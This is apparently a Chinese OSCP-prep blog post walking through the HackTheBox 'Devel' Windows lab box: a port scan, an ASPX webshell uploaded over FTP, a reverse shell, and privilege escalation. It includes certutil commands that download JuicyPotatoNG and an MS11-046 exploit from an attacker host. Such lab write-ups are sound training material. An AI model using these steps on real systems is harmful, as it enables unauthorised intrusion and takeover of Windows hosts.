OSCP备考_0x38_HackThBox靶机_Windows_Devel

Ethan医生2周前靶场27

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)

image.png


使用ftp进行连接

ftp 10.129.254.198 21


http://10.129.254.198/webshell.aspx

image.png

上传webshell以后使用webshell进行反弹


由于直接使用都会端开 这边找到

https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

进行反弹

image.png

开始进行提权

  • System : Win 7 x64 6.1.7600 N/A Build 7600

尝试下载提权土豆

certutil -urlcache -split -f "http://10.10.16.43:8000/EXE/JuicyPotatoNG.exe" JuicyPotatoNG.exe

然后执行提权

根據google的結果,發現有MS11–046的漏洞,並在github找到exploit可以拿來利用。

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046?source=post_page-----afe2d27ea037---------------------------------------

certutil -urlcache -split -f "http://10.10.16.43:8000/ms11-046.exe" ms11-046.exe

image.png

image.png


标签: OSCP

相关文章

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)发现是tomcat直接测试看看能不能爆破登入,上传war包&n...

OSCP备考_0x17_Vulnhub靶机_joy

OSCP备考_0x17_Vulnhub靶机_joy

名称说明靶机下载链接攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168.233.184arp-scan 192.168.233.1/24nmap -p- 1...

OSCP备考_0x41_HackThBox靶机_Windows_granny

OSCP备考_0x41_HackThBox靶机_Windows_granny

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)发现有webdav可以利用davtest -url htt...

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。